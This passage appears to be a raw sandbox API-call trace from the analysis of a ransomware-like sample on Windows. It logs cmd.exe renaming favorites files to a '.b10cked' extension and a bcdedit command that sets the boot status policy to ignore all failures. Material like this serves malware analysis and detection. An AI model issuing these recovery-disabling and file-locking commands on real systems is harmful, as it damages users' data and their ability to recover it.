\"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" [0215.498] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" [0215.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.499] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.499] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.499] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.499] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.499] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.499] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.499] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.499] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.499] GetEnvironmentStringsW () returned 0x3c22c8* [0215.499] FreeEnvironmentStringsW (penv=0x3c22c8) returned 1 [0215.499] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.499] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.500] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.500] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.500] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.500] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.500] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.500] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f600 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f600, lpFilePart=0x26f5fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f5fc*="Desktop") returned 0x18 [0215.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.500] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f37c | out: lpFindFileData=0x26f37c) returned 0x3c0008 [0215.500] FindClose (in: hFindFile=0x3c0008 | out: hFindFile=0x3c0008) returned 1 [0215.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.501] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.501] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.501] GetEnvironmentStringsW () returned 0x3c2ae8* [0215.501] FreeEnvironmentStringsW (penv=0x3c2ae8) returned 1 [0215.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.501] GetConsoleOutputCP () returned 0x1b5 [0215.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.501] GetUserDefaultLCID () returned 0x409 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f740, cchData=128 | out: lpLCData="0") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f740, cchData=128 | out: lpLCData="0") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f740, cchData=128 | out: lpLCData="1") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.502] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.503] GetConsoleTitleW (in: lpConsoleTitle=0x3b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.504] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.504] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.504] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.504] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.504] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.504] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.504] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.506] GetConsoleTitleW (in: lpConsoleTitle=0x26f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.506] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.506] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.506] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.506] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.507] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.507] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.507] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.507] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.507] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.507] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.507] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.507] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.507] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.507] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.507] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.507] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.507] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.507] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.507] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.509] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f1f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f1ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f1ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.510] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.510] _wcsicmp (_String1="MSN.url", _String2=".") returned 63 [0215.510] _wcsicmp (_String1="MSN.url", _String2="..") returned 63 [0215.510] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.510] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.510] SetErrorMode (uMode=0x0) returned 0x0 [0215.510] SetErrorMode (uMode=0x1) returned 0x0 [0215.510] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26eb7c, lpFilePart=0x26eb64 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x26eb64*="MSN.url") returned 0x2a [0215.510] SetErrorMode (uMode=0x0) returned 0x1 [0215.510] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.511] _wcsicmp (_String1="MSN.url", _String2=".") returned 63 [0215.511] _wcsicmp (_String1="MSN.url", _String2="..") returned 63 [0215.511] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.511] SetErrorMode (uMode=0x0) returned 0x0 [0215.511] SetErrorMode (uMode=0x1) returned 0x0 [0215.511] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26eff8, lpFilePart=0x26ed90 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x26ed90*="MSN.url") returned 0x2a [0215.511] SetErrorMode (uMode=0x0) returned 0x1 [0215.511] SetErrorMode (uMode=0x0) returned 0x0 [0215.511] SetErrorMode (uMode=0x1) returned 0x0 [0215.511] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", nBufferLength=0x104, lpBuffer=0x26f200, lpFilePart=0x26ed90 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", lpFilePart=0x26ed90*="MSN.url.b10cked") returned 0x32 [0215.511] SetErrorMode (uMode=0x0) returned 0x1 [0215.511] SetLastError (dwErrCode=0x0) [0215.511] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url.b10cked")) returned 0xffffffff [0215.511] GetLastError () returned 0x2 [0215.511] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", fInfoLevelId=0x1, lpFindFileData=0x26e70c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e70c) returned 0x3b0e50 [0215.511] FindNextFileW (in: hFindFile=0x3b0e50, lpFindFileData=0x26e70c | out: lpFindFileData=0x26e70c) returned 0 [0215.512] GetLastError () returned 0x12 [0215.512] FindClose (in: hFindFile=0x3b0e50 | out: hFindFile=0x3b0e50) returned 1 [0215.513] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", fInfoLevelId=0x1, lpFindFileData=0x3c1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1bd0) returned 0x3b0e50 [0215.513] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", nBufferLength=0x104, lpBuffer=0x26e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", lpFilePart=0x0) returned 0x32 [0215.513] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x0) returned 0x2a [0215.513] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.513] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url.b10cked"), dwFlags=0x3) returned 1 [0215.513] FindClose (in: hFindFile=0x3b0e50 | out: hFindFile=0x3b0e50) returned 1 [0215.513] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e958 | out: _Buffer=" 1") returned 9 [0215.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.513] GetFileType (hFile=0x7) returned 0x2 [0215.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.514] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e8e4 | out: lpMode=0x26e8e4) returned 1 [0215.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.514] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e918 | out: lpConsoleScreenBufferInfo=0x26e918) returned 1 [0215.514] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.514] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e958 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.514] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26e93c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e93c*=0x1a) returned 1 [0215.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.599] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.599] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.599] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.599] SetConsoleInputExeNameW () returned 0x1 [0215.599] GetConsoleOutputCP () returned 0x1b5 [0215.599] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.599] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.599] exit (_Code=0) Process: id = "538" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16800" os_pid = "0xd08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31785 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31786 start_va = 0xd70000 end_va = 0xdb9fff entry_point = 0xd70000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 31787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31789 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31790 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31792 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31793 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31794 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31795 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 31796 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31797 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31798 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31799 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31800 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31801 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31802 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31803 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 739 os_tid = 0xa8c Process: id = "539" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31772 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31773 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31774 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31775 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31776 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31777 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 